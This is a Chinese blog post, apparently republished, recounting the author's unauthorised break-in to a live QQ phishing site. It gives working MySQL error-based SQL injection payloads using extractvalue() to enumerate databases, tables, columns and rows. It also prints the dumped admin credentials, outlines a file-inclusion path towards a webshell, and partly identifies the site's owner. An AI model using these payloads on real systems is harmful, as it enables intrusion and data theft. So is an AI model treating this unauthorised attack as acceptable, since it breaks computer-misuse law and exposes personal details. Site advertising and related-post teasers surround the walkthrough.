【漏洞挖掘】QQ钓鱼网站实战渗透[通俗易懂]

【漏洞挖掘】QQ钓鱼网站实战渗透[通俗易懂]渗透实战,通过报错注入拿到后台账号密码。

大家好,又见面了,我是你们的朋友全栈君。如果您正在找激活码,请点击查看最新教程,关注关注公众号 “全栈程序员社区” 获取激活教程,可能之前旧版本教程已经失效.最新Idea2022.1教程亲测有效,一键激活。

Jetbrains全系列IDE使用 1年只要46元 售后保障 童叟无欺

一、信息收集

在一个风和日丽的下午,突然在我们专业群里面有位同学发来一个二维码要收集信息,说需要微信扫描后填写信息

【漏洞挖掘】QQ钓鱼网站实战渗透[通俗易懂]

像这种二维码,这种介绍,一眼就看出它不是好东西。闲的没事干的我,就准备爆入它,刚好给我这小白练练手。果不其然。这种假页面,就是不法分子用来收集信息的,而且除了能输入外,底下的忘记密码和注册新账号根本点不动。啊,太假了。不知道害了多少人。

【漏洞挖掘】QQ钓鱼网站实战渗透[通俗易懂]

这里我直接用了一个信息收集网站,输入域名后自动收集,用nmap扫了扫。信息收集网站:TideFinger 潮汐指纹 TideFinger 潮汐指纹

操作系统:Linux(操作系统也可以直接将域名中随便一个字母改变大小写看网站反应,linux大小写敏感会报错,windows不敏感)

中间件:nginx

后端语言:php

ip:45.xxx.xxx.xxx(美国)

开放端口:21/tcp open ftp

80/tcp open http

888/tcp open accessbuilder

域名注册人邮箱:26618xxxxx@qq.com(搜了一下是贵州的,今年19岁)

目录扫描:2.rar(我下载下来是源码泄露了,先不管这个,黑盒测试一波)

【漏洞挖掘】QQ钓鱼网站实战渗透[通俗易懂]

【漏洞挖掘】QQ钓鱼网站实战渗透[通俗易懂]

【漏洞挖掘】QQ钓鱼网站实战渗透[通俗易懂]

二、漏洞发现

看见这输入框我就想注入,先不管其他的,试试再说。浏览器开启的代理,准备用burp拦截,但是burp还没有反应,浏览器这边提示必须输入数字。由此判断是前端限制。

【漏洞挖掘】QQ钓鱼网站实战渗透[通俗易懂]

这里可以直接浏览器f12删除type=”number”绕过前端限制。接下来burp拦截。

【漏洞挖掘】QQ钓鱼网站实战渗透[通俗易懂]

网站直接报错,反应头还提示为什么错,直接暴露表和字段,可能debug没关。

直接报错注入,用extractvalue()

(1)条件1:secure_file_priv无限制

(2)条件2:目录权限可读

(3)限制:extractvalue()函数最多读取32个字符

【漏洞挖掘】QQ钓鱼网站实战渗透[通俗易懂]

payload:’and(select extractvalue(1,concat(0x7e,(select database()))))直接拼接在u后面,数据库是w01

【漏洞挖掘】QQ钓鱼网站实战渗透[通俗易懂]

访问url/2.rar下载压缩包,解压发现是网站源码

【漏洞挖掘】QQ钓鱼网站实战渗透[通俗易懂]

发现w1是网站后台需要账户密码

【漏洞挖掘】QQ钓鱼网站实战渗透[通俗易懂]

三、漏洞利用

接下来就好办多了

数据库版本是5.6.50(information_schema保存了MySQL服务器所有数据库的信息。 如数据库名,数据库的表(mysql 5.0以上有),5.0以下只能通过爆破猜表名字段)

查数据库名:u=’and(select extractvalue(1,concat(0x7e,(select database()))))

爆表名:u=’and(select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))))

爆字段名:u=’and(select extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name=”TABLE_NAME”))))

爆数据:u=’and(select extractvalue(1,concat(0x7e,(select group_concat(COIUMN_NAME) from TABLE_NAME))))

因为之前回应头注释已经暴露了表名和字段,也可以直接查。这就是他们收集的QQ号密码了(因为extractvalue()函数最多读取32个字符可以使用limit在后面限制输出,第一个数字代表从第几行数据输出,第二个数字代表输出几行数据)

payload:u=’and(select extractvalue(3,concat(0x7e,(select user_name from cc_users limit 0,1 ))))#

【漏洞挖掘】QQ钓鱼网站实战渗透[通俗易懂]

爆相应的密码

payload:u=’and(select extractvalue(3,concat(0x7e,(select user_psw from cc_users limit 0,1 ))))#

【漏洞挖掘】QQ钓鱼网站实战渗透[通俗易懂]

当然,通过源码泄露我直接收集了所有表名

【漏洞挖掘】QQ钓鱼网站实战渗透[通俗易懂]

回到我们的源码,后台登录的地方,直接代码审计,发现后台账户密码在cc_admins这张表里面

【漏洞挖掘】QQ钓鱼网站实战渗透[通俗易懂]

报错注入把所有字段都爆出来

payload:u=’and(select extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name=”cc_admins” limit 0,1))))#(改变0到7,爆出8个字段)

【漏洞挖掘】QQ钓鱼网站实战渗透[通俗易懂]

报错注入把对应字段的数据爆出来

payload:u=’and(select extractvalue(1,concat(0x7e,(select f_userName from cc_admins limit 0,1))))#(改变字段值)

【漏洞挖掘】QQ钓鱼网站实战渗透[通俗易懂]

f_id, f_userPwd(e19d5cd5af0378da05f63f891c7467a), f_userName(admin),f_groupid(1), f_status(1), f_tag(100),f_psw(abcd1234),f_reg_time(1533386669)

用sqlmap跑不动,我也不知道为啥,只能手动注入了

账号:admin 密码:abcd1234。成功进入后台,后台记录着受骗者的QQ和密码还有其他重要信息。

【漏洞挖掘】QQ钓鱼网站实战渗透[通俗易懂]

这里报错得到了网站绝对路径,但是mysql不是root权限,没办法插入一句话木马得到webshell

【漏洞挖掘】QQ钓鱼网站实战渗透[通俗易懂]

通过审计代码发现有一个备份王,在网上搜索相关漏洞没找出来

【漏洞挖掘】QQ钓鱼网站实战渗透[通俗易懂]

但是发现在/config/sbak/phomebak.php这个文件中发现$mypath可控,跟进代码

【漏洞挖掘】QQ钓鱼网站实战渗透[通俗易懂]

这个Ebak_BakExe函数没有对mypath做任何过滤处理就包含了,想到了%00截断后面路径,这样上传带木马的图片就可以利用这个文件包含漏洞,但是前提是先能找到这个备份王的账号密码,没有办法直接跳过登录,访问这个页面。

【漏洞挖掘】QQ钓鱼网站实战渗透[通俗易懂]

就在我正要进行下一步的时候,他跑路了……………..

【漏洞挖掘】QQ钓鱼网站实战渗透[通俗易懂]

后台有一个可以上传文件的地方,但是我没有看出来有什么漏洞。

【漏洞挖掘】QQ钓鱼网站实战渗透[通俗易懂]

四、总结

        入一半突然没了。先是通过信息收集,网站源码泄露下载到源码,发现网站后台路径。然后通过网站收集qq密码的页面发现了报错注入,由此得到了后台账号和密码,进入后台。通过源码审计发现”备份王“的文件包含漏洞,接下来准备再通过注入得到”备份王“的账号和密码,然后就可以利用这个漏洞,再在后台尝试文件上传漏洞,如果可以。两个洞配合拿到websell。可惜啊!他跑路了。无了。

我也不知道他收集qq和密码有什么目的,现在登录qq都需要手机端验证,有可能撞库其他什么平台密码。

版权声明:本文内容由互联网用户自发贡献,该文观点仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请联系我们举报,一经查实,本站将立刻删除。

发布者:全栈程序员-站长,转载请注明出处:https://javaforall.net/172681.html原文链接:https://javaforall.net

(0)
全栈程序员-站长的头像全栈程序员-站长


相关推荐

  • 详解Java异或运算符

    详解Java异或运算符文章原地址目录目录 性质 应用举例 其他用途示例 异或是一种基于二进制的位运算,用符号XOR或者^表示,其运算法则是对运算符两侧数的每一个二进制位同值则取0,异值则取1.简单理解就是不进位加法,如1+1=0,0+0=0,1+0=1.Forexample:3^5=6转成二进制后就是0011^0101二号位和三号位都是异值取1末尾两个1同值取零,…

    2022年9月27日
    0
  • 本地计算机上的task scheduler服务启动后停止_task

    本地计算机上的task scheduler服务启动后停止_task1.如果对应服务依赖都正常情况下,请参考下面解决方案进入注册表(cmd–>regedit,依次找到HKEY_LOCAL_MACHINE\HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\RPC\INTERNET,删除INTERNET,重启服务器注:删除前请导出备份…

    2022年10月11日
    1
  • 测试负责人如何管理(如何成为优秀的团队负责人)

    前言:今天是2021年11月17日,我入职新公司工作的第20天,工作也确实比较忙,准确的来说在公司大家都忙,我基本上都是早上7点半起床,晚上12点到家,睡午觉的时间忙中偷闲更新下博客!作为测试负责人如何规范测试团队?一、我的提问二、你会发现存在的问题1、流程不规范2、缺乏沟通3、没有共享文档4、没有输出三、如何做好流程规范1、测试进度及计划面板2、技术评审3、提测规范4、测试用例评审四、如何做好流程规范1、测试进度及计划面板一、我的提问当你来到一个项目不规范的技术团队,你会怎么处理呢?二、你会发现存

    2022年4月10日
    49
  • 网址转二维码,如何批量将网址转为二维码[通俗易懂]

    网址转二维码,如何批量将网址转为二维码[通俗易懂]1.首先打开Excel软件,将网址录入到Excel表格中。2.然后我们选中网址数据单元格3.接着我们点击【图片工具】4.选择【批量生成】5.在选项里设置合适的保存位置6.最后我们点击【确定】即可完成7.完成效果如下图所示(二维码图片已打上马赛克)…

    2022年9月4日
    2
  • 多个单列索引和联合索引的区别详解

    多个单列索引和联合索引的区别详解背景:为了提高数据库效率,建索引是家常便饭;那么当查询条件为2个及以上时,我们是创建多个单列索引还是创建一个联合索引好呢?他们之间的区别是什么?哪个效率高呢?我在这里详细测试分析下。一、联合索引测试注:Mysql版本为5.7.20创建测试表(表记录数为63188):CREATETABLE`t_mobilesms_11`(`id`bigint(20)NOT…

    2022年6月4日
    44

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注

关注全栈程序员社区公众号